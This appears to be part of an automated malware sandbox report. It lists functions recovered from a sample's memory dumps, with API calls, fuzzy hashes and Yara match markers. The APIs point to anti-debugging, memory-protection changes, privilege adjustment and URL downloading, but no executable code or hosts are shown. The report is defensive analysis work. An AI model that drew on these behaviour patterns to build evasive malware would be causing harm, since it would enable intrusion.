Opcode Fuzzy Hash: 2077f1aabd2467a96f5229c010f6208ad0b30cdc07cbf7f898b69ea09d20579e
Instruction Fuzzy Hash: C7412831E08646DEEF2F2A3888A83B97A57AB05254F97155BD8C3C70D0E3F5B485C683

Uniqueness

Uniqueness Score: -1.00%

Function 011073CB, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f6d4e597cbf55bd20241774e4cfeb82e766fa3c3bb8381f9a756a630a6db879
Instruction ID: ddd988c2db85563e97ce34e56729761887f19de12dd74c49d8fb911efe79c290
Opcode Fuzzy Hash: 4f6d4e597cbf55bd20241774e4cfeb82e766fa3c3bb8381f9a756a630a6db879
Instruction Fuzzy Hash: CE41E331E08646CEEF2F2A2889A83B53A63AB05254F971557D8C3C70D1E3E5B5C5CA93

Uniqueness

Uniqueness Score: -1.00%

Function 011074A0, Relevance: 1.6, APIs: 1, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 6a17b6bca615139c142a6e1481eb6b5625ea48e382b84c30d48d3f8f9dd47136
Instruction ID: 87eaa777185e34727b0c896da96045bc83d936ace188979c0be3267a5115a952
Opcode Fuzzy Hash: 6a17b6bca615139c142a6e1481eb6b5625ea48e382b84c30d48d3f8f9dd47136
Instruction Fuzzy Hash: 75414971E08546DEEB2F2A3488A83A97D67AB05260F971657D4C3870D1E3F1B184C6D3

Uniqueness

Uniqueness Score: -1.00%

Function 011073EB, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5959268c25ffbbb6d84afa038128acf04f3e97cfda2f414e9f07310f96c347
Instruction ID: 0e054f3a7cd008cbf0204a461d06fc5b3f44425dc7b4c8d55016ba5f3b500f42
Opcode Fuzzy Hash: 4a5959268c25ffbbb6d84afa038128acf04f3e97cfda2f414e9f07310f96c347
Instruction Fuzzy Hash: 45410931E08646DEEF2F292888A83B53A536B05254F971557D8C3C70D0E3F5B5C5C693

Uniqueness

Uniqueness Score: -1.00%

Function 01107417, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466668f25cc5f348a4027dba3b999eab47226919acfc6ddb9d2c42bdc1010db1
Instruction ID: be5ac787a4fa4528067d0299f8696e34f685edc49359b17810569a745dffeaa9
Opcode Fuzzy Hash: 466668f25cc5f348a4027dba3b999eab47226919acfc6ddb9d2c42bdc1010db1
Instruction Fuzzy Hash: F441F631E08646CEEF2F6A2884A83B57A62AB05354F97155BD8C3870D1E3F5B4C5C683

Uniqueness

Uniqueness Score: -1.00%

Function 0110752F, Relevance: 1.6, APIs: 1, Instructions: 133nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: befeaf6b3e4e87d4db9597ddd095078452b5110bdb5885b071cd59c6bc447d3e
Instruction ID: 68477832c3d5d9e9364f634513d03afa467496c1f31b0fc8f7f386133f1116f3
Opcode Fuzzy Hash: befeaf6b3e4e87d4db9597ddd095078452b5110bdb5885b071cd59c6bc447d3e
Instruction Fuzzy Hash: 9C416C71E0C286CEDB2F293448A83E87E57AB06260F9B0557D4C3870D1E3E6B5C5C693

Uniqueness

Uniqueness Score: -1.00%

Function 011073B3, Relevance: 1.6, APIs: 1, Instructions: 132librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF
NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadProcessQuery
String ID:
API String ID: 1311672033-0
Opcode ID: fd0c2760e791508a7131ea7909fa08a777116054fe6106c55a629300c91a18d4
Instruction ID: 9a166aa03d5ed433a77d5bbd9048ea50792feb6d0c96a177b94e1075aaf8f5df
Opcode Fuzzy Hash: fd0c2760e791508a7131ea7909fa08a777116054fe6106c55a629300c91a18d4
Instruction Fuzzy Hash: 2741C031E08606CEEF2F6A2888983F53AA2AB15354FA71557D8C3875D1D3E5B4C5CA83

Uniqueness

Uniqueness Score: -1.00%

Function 011074DF, Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: a50569a62bbcb6e2863b69c8edc74adb33e43c7ad0f17a25a9aa967753287df4
Instruction ID: db8f31bff6cc62fb7f954b0a37a46311f8f5d7d3cb4a334e949d16b03215e587
Opcode Fuzzy Hash: a50569a62bbcb6e2863b69c8edc74adb33e43c7ad0f17a25a9aa967753287df4
Instruction Fuzzy Hash: 45316C71D08546DEEB2F293488A83B87E57AB05260F9B1557D4C3870D1E3F2B5C5C693

Uniqueness

Uniqueness Score: -1.00%

Function 01107457, Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e6136dadf65d89fb295b536cda7fa10c210fd60c8d3cdb525999058000679212
Instruction ID: 174da9f5d958e23fca8fd9211118226c8fad4a6a77be8d7ac5396e95247bb348
Opcode Fuzzy Hash: e6136dadf65d89fb295b536cda7fa10c210fd60c8d3cdb525999058000679212
Instruction Fuzzy Hash: FE314830E08546CEEF2F2A2888A83F979526B05260F9B155BD9C3870D1D3F2B4C4C6C3

Uniqueness

Uniqueness Score: -1.00%

Function 0110759F, Relevance: 1.6, APIs: 1, Instructions: 95nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b956d3e3f8a0adeb8db39c229a2721c3975c87e6e8bfd6371f43344cb8862ed8
Instruction ID: 4b9b33987c8a9229ec766a19f17c5a116d40c33cdb5abd4673fc597eea55837d
Opcode Fuzzy Hash: b956d3e3f8a0adeb8db39c229a2721c3975c87e6e8bfd6371f43344cb8862ed8
Instruction Fuzzy Hash: 61210671E08246DEEB2F292884AC3F579566B05290F9B1557D9C3874D0D3F2F1C4CA93

Uniqueness

Uniqueness Score: -1.00%

Function 011075BB, Relevance: 1.6, APIs: 1, Instructions: 95nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 029c712a36f69c41a11591592a0ce8270afddc31f87f14761fded30f84b55e12
Instruction ID: 822907975b9e684a5ffcaeb2fbfbb9811095376a72398613de8db01f542e45d4
Opcode Fuzzy Hash: 029c712a36f69c41a11591592a0ce8270afddc31f87f14761fded30f84b55e12
Instruction Fuzzy Hash: 84210871E0C246DEEB2F2A2888AC3F57A666B06290F9A0557D4C3870D1D3F2B1C4C693

Uniqueness

Uniqueness Score: -1.00%

Function 0110755B, Relevance: 1.6, APIs: 1, Instructions: 93nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b784f9e77fa7dbba258d6ee8d7bfc4627ac38a40cc23776fe036205472a9a342
Instruction ID: b0e29ffaee65a7231f6024aa8d5b5f28ca80190922dd5c616fe08ee612ace6c6
Opcode Fuzzy Hash: b784f9e77fa7dbba258d6ee8d7bfc4627ac38a40cc23776fe036205472a9a342
Instruction Fuzzy Hash: 2D21F731E08516DEEB2F2A2888AC3F535626B05254F971957D4C3460E1D3F2B1C4CAC3

Uniqueness

Uniqueness Score: -1.00%

Function 01107583, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: dd81d58c1c8ba54f1be14f378bd410d4746d5b52b6750ebdecd265d9e4271eca
Instruction ID: 0803fccece9f9b38ac66b05bc30741f20ba366d5f4e83dc8e9cbe1e103d17535
Opcode Fuzzy Hash: dd81d58c1c8ba54f1be14f378bd410d4746d5b52b6750ebdecd265d9e4271eca
Instruction Fuzzy Hash: 0B21D671E08146DEEB2F292884AC3B979626B05294F9B1557D8C3874E1D3F2F5C5CA83

Uniqueness

Uniqueness Score: -1.00%

Function 01107663, Relevance: 1.6, APIs: 1, Instructions: 89nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e0b9ff3225d13b604702967d6db7bbef041919e0b0441cf3e9905543c4ffb156
Instruction ID: 00349904b3e02f2eb591beb4cd267fb4908c16e9c8454d2a47b4cebcc61d8ac1
Opcode Fuzzy Hash: e0b9ff3225d13b604702967d6db7bbef041919e0b0441cf3e9905543c4ffb156
Instruction Fuzzy Hash: E5217C71E08647DEE71F2D3849B9268BE5B6B061A0F5A0657C5C3870D0E3E2B188C692

Uniqueness

Uniqueness Score: -1.00%

Function 011076CB, Relevance: 1.6, APIs: 1, Instructions: 89nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: cf0c266af81727e5c746005ae319c9270a86dba09ec094da1200b0ec5d283668
Instruction ID: c6505979cb46b5b7c5673074a7d75e79feaae4a4ba19e139475392b7d18378db
Opcode Fuzzy Hash: cf0c266af81727e5c746005ae319c9270a86dba09ec094da1200b0ec5d283668
Instruction Fuzzy Hash: 1E213BB5F0C687DE671F29380DFA1A9BE5F68471A03590356C5D38B0E0E3E27145C662

Uniqueness

Uniqueness Score: -1.00%

Function 01107603, Relevance: 1.6, APIs: 1, Instructions: 79nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f2ef8caea07e49b13b954512c7fd9e7994e548a9bf87ba3473d20d7e2d01d626
Instruction ID: 4189e30c3331cb92688893cdd0021cadafcbfbe774ffb13378b067ffb2c8edf1
Opcode Fuzzy Hash: f2ef8caea07e49b13b954512c7fd9e7994e548a9bf87ba3473d20d7e2d01d626
Instruction Fuzzy Hash: 32210630E08646DEEB2F292884AC7F576A66B01294F9B4557D9C3460E1D3F2F5C8CAD3

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DC8AF87

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 5ac2d3110c40376a02a51f0b30280f7542f20dd80c31f37108e901f4e946bb46
Instruction ID: ad822704ad74e68dde6c093a489aa8957b33cf38b3091965ddd011f26e618f32
Opcode Fuzzy Hash: 5ac2d3110c40376a02a51f0b30280f7542f20dd80c31f37108e901f4e946bb46
Instruction Fuzzy Hash: AB219FB6509784AFDB128F25DC44B52BFB4EF06214F0984DAE985CF163D275E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011075E7, Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b2f9808c269b96d7ebc707d544860976499329947f8d9012dbc237921f046494
Instruction ID: 1364891f6f81680e70a299dc53cd76d00ce07de4e2ca10abe05acaefc8a2e281
Opcode Fuzzy Hash: b2f9808c269b96d7ebc707d544860976499329947f8d9012dbc237921f046494
Instruction Fuzzy Hash: BF11E630E08606DEEB2F2A28889C7B536A26B01294FAA4557D8C3460E1D3F1F5C4CAD3

Uniqueness

Uniqueness Score: -1.00%

Function 0110777F, Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 4135da55455525f8ff2dd21bbd58c7284e96140068a368b7d0a27b1d75be865a
Instruction ID: e9d64d1ad48230f0830f9db17f18b9e13c5f1abb08ed867e54815cf18536f1c2
Opcode Fuzzy Hash: 4135da55455525f8ff2dd21bbd58c7284e96140068a368b7d0a27b1d75be865a
Instruction Fuzzy Hash: B011CCB2F0CA87DD531F29344DFF65CBD9F599A0D030E4566C5E18A0D1E792B149C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 011076AB, Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: cd7814a76df6d726ea43fc179ece864683514d7040670a15f4b3392b7cd32c99
Instruction ID: 2420bbbc1ef9008bf8f5462b409f697fa7506133f3985096d61ecc3017fc8bdd
Opcode Fuzzy Hash: cd7814a76df6d726ea43fc179ece864683514d7040670a15f4b3392b7cd32c99
Instruction Fuzzy Hash: 5E012DB5F0CA47DD272F293849EA1A97D5B584A1D039E0656C5D3CB0E0D3E2B145C293

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1DC8B0F5

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 280a4e2f0d736bac6d50d8cc102454aae6bc1e69e4d53b0b1814b31d6b92fe1d
Instruction ID: a5ff7861a29bc406df8a421dc4ee697b672fe3ee029bfb6600d7e2923b016888
Opcode Fuzzy Hash: 280a4e2f0d736bac6d50d8cc102454aae6bc1e69e4d53b0b1814b31d6b92fe1d
Instruction Fuzzy Hash: 5E118B724097C4AFD712CF24DC45A52FFB4EF06324F0984DAE9888F263D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0110770C, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b79b9a3222008694141a873c471cabc3325d822d789bd55cea40fafe0c767a6e
Instruction ID: 2d5d78b876521f5f3f43c46d67a69baf320ac7dfc3906450da9ca37ed86ddb65
Opcode Fuzzy Hash: b79b9a3222008694141a873c471cabc3325d822d789bd55cea40fafe0c767a6e
Instruction Fuzzy Hash: D401FE71F08907DE271F39344AEE16D7D9B69461D074D0656C6D38B0D0E3E2B145C692

Uniqueness

Uniqueness Score: -1.00%

Function 01107747, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 69c868becefec106b56d5f4e21064034608092a329723fed7b15db42db4b7ff0
Instruction ID: 3e5d1882216195762b4beca96e495d9e1ed0bc2cca3d5eff5f98b7b1bb7b5742
Opcode Fuzzy Hash: 69c868becefec106b56d5f4e21064034608092a329723fed7b15db42db4b7ff0
Instruction Fuzzy Hash: 3D01D672E4CE87DD571F293449FEA1CBDAF5D8A0D030A4A5EC4D2874D1E796B209C2A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DC8AF87

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: d7a41c037ce9f9168d0bf8914b9574de779e6a276cc74166f091fc61111475c8
Instruction ID: a7329a3c2cebcb5c28c93062f703cd23db3ab7fdd92bb6fcaed5e9500246a554
Opcode Fuzzy Hash: d7a41c037ce9f9168d0bf8914b9574de779e6a276cc74166f091fc61111475c8
Instruction Fuzzy Hash: 7E119E725007449FDB11CF59D884B56FBE4EF04220F08C8AAED49CB612D271E418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1DC8B0F5

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 596f7dee9f02db59dc78e3af40eb19dd34ab9ff70a66e7eecd6b9386f03f6273
Instruction ID: 005af680128ff86dbdbb53253b6e0bb7fd3d4f5e9bc3fb46e072bdfeb5642507
Opcode Fuzzy Hash: 596f7dee9f02db59dc78e3af40eb19dd34ab9ff70a66e7eecd6b9386f03f6273
Instruction Fuzzy Hash: EB018F31500644DFD721CF45D884B12FFA0EF04725F08C49AEE484B212C375A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 01106E22, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,011069DC,00000040,01102813,00000000,00000000,00000000,00000000,?), ref: 01106E3B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 01104417, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(01104535,011048C7), ref: 01104437

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5966d785a6eabb83391571e4a033dd517f919dd148670e3b1466b0c2b608ab1c
Instruction ID: 6c0906e8e13331987d2e58087c06d02ae7525dfe7f2d02506d6cfbc900c4de31
Opcode Fuzzy Hash: 5966d785a6eabb83391571e4a033dd517f919dd148670e3b1466b0c2b608ab1c
Instruction Fuzzy Hash: 05C080F264C6DD5E8205F51005F700DBE4F57D7150719D24781948E4D5D771531ED761

Uniqueness

Uniqueness Score: -1.00%

Function 20040006, Relevance: 4.0, Strings: 3, Instructions: 215COMMON

Download Yara Rule

Strings

:@:r, xrefs: 200401F0
:@:r, xrefs: 200402E0
KDBM, xrefs: 20040231

Memory Dump Source

Source File: 00000013.00000002.865098505.0000000020040000.00000040.00000001.sdmp, Offset: 20040000, based on PE: false

Similarity

API ID:
String ID: :@:r$:@:r$KDBM
API String ID: 0-380591495
Opcode ID: d50db904d63982a477e30433db710b3eaa14923f8fb78701cd066e7b8c9d8ad2
Instruction ID: 077e2f7421d4e6bfc1677a03393121de8bf24e3b6be6100a7a4f7ca6ba2ae599
Opcode Fuzzy Hash: d50db904d63982a477e30433db710b3eaa14923f8fb78701cd066e7b8c9d8ad2
Instruction Fuzzy Hash: 87915E30204295CFC30EAB78C8C87997FB5FF85754F1099E9E1458B259DFB45886CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011057AB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Strings

down, xrefs: 011057D7

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: down
API String ID: 1029625771-486510651
Opcode ID: 40c78bc6a5824965b61651d994889457169e745d2150bedb21918a85beec72c7
Instruction ID: 5b717eaca59ddeac207a775fa9462ef4685fa1f3d1d80aaf35de93351883df76
Opcode Fuzzy Hash: 40c78bc6a5824965b61651d994889457169e745d2150bedb21918a85beec72c7
Instruction Fuzzy Hash: 23319970D48386ECCAAF2A1946B23BD6E5BAB43174F45631B8C824B0C3E3C08345CE87

Uniqueness

Uniqueness Score: -1.00%

Function 01103C4D, Relevance: 3.2, APIs: 2, Instructions: 172networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0110438C,00000000,00000000,00000000,00000000), ref: 01103C9E
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 9577b36fb5c902079cf8ec11def931e7bf65f95459f3f28a47e9b5a0ed3d1c7f
Instruction ID: 92b1585baed554f8b8afabb5f520c930b34b548fadc7932ebc464ee4fbd43723
Opcode Fuzzy Hash: 9577b36fb5c902079cf8ec11def931e7bf65f95459f3f28a47e9b5a0ed3d1c7f
Instruction Fuzzy Hash: 87516730B44346AFFF3F4E28CE51BEA3766BF41390F408129ED9A9B1C1D7B09940A612

Uniqueness

Uniqueness Score: -1.00%

Function 01103C06, Relevance: 3.1, APIs: 2, Instructions: 118networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0110438C,00000000,00000000,00000000,00000000), ref: 01103C9E
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 7cbf1936b42ee5127f331e66013964ef2b65e20f0058399366125bc0bbc02cd7
Instruction ID: f981ac734c49594511e46521be0d32e1d92825e2acde06a542a1dd2d2c49883b
Opcode Fuzzy Hash: 7cbf1936b42ee5127f331e66013964ef2b65e20f0058399366125bc0bbc02cd7
Instruction Fuzzy Hash: 2E312730B9034AAFFB3A4E24DD55BEA3799BF42340F844025ED9A9B1C1D7B099449712

Uniqueness

Uniqueness Score: -1.00%

Function 01103C83, Relevance: 3.1, APIs: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0110438C,00000000,00000000,00000000,00000000), ref: 01103C9E
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 9543a1647fedb6fce9e7b9b8cc4713362085bc12cd8c2dbbb49241bb82f92f3d
Instruction ID: 41ab4a11d9e5bf430953127331ba9c73bb327cc095313d6a9b4e90d2800476c0
Opcode Fuzzy Hash: 9543a1647fedb6fce9e7b9b8cc4713362085bc12cd8c2dbbb49241bb82f92f3d
Instruction Fuzzy Hash: A4311330B9434AAFFB3A4D24DE65BFE375ABF46340F444025EDAACA1C1D7B09944A712

Uniqueness

Uniqueness Score: -1.00%

Function 20040A90, Relevance: 2.1, Strings: 1, Instructions: 891COMMON

Download Yara Rule

Strings

J*U^, xrefs: 20041488, 2004148D

Memory Dump Source

Source File: 00000013.00000002.865098505.0000000020040000.00000040.00000001.sdmp, Offset: 20040000, based on PE: false

Similarity

API ID:
String ID: J*U^
API String ID: 0-2198005702
Opcode ID: e3a453db7373438343f9fc0e32ae70dee0b1f19769902deee5360235519ec0a1
Instruction ID: 28c7f1eeac0f7bbb9f665ab93c90c1f53ee52a6ba920128d0b9cd9d777f33ec6
Opcode Fuzzy Hash: e3a453db7373438343f9fc0e32ae70dee0b1f19769902deee5360235519ec0a1
Instruction Fuzzy Hash: 1862E130B082858FE709ABB8C854BAD7BF2AF85300F1588BAD505EB292DB75DC45C756

Uniqueness

Uniqueness Score: -1.00%

Function 011023BF, Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 011023B2

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 4ccc77b38928ba1ee5ae31c41f61c4ea3bc9cd3008b09bd24420ce4127aedc1c
Instruction ID: a53268f9452ca4a854c9e327056ef61e527d13119b76de3d7a6800101e5f2f3d
Opcode Fuzzy Hash: 4ccc77b38928ba1ee5ae31c41f61c4ea3bc9cd3008b09bd24420ce4127aedc1c
Instruction Fuzzy Hash: 2B518CB0A083029FEB1E5E18CDDDBE97756BF1A370F564255E8518B0D2D3F5C484C652

Uniqueness

Uniqueness Score: -1.00%

Function 01102318, Relevance: 1.6, APIs: 1, Instructions: 143threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 011023B2

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 2e8af32bf6cee45898be81d49ecadab0f4b444480522b275785d03b933d44c26
Instruction ID: f29fe02cce762c5ae937462fbde666565be44d4ccb4372684377ca5f1055ecd0
Opcode Fuzzy Hash: 2e8af32bf6cee45898be81d49ecadab0f4b444480522b275785d03b933d44c26
Instruction Fuzzy Hash: BD217B70A143029EDF1F5E28CAD9BE93756BF16370FA54266DC52471D3E3E684848623

Uniqueness

Uniqueness Score: -1.00%

Function 011025CA, Relevance: 1.6, APIs: 1, Instructions: 141libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

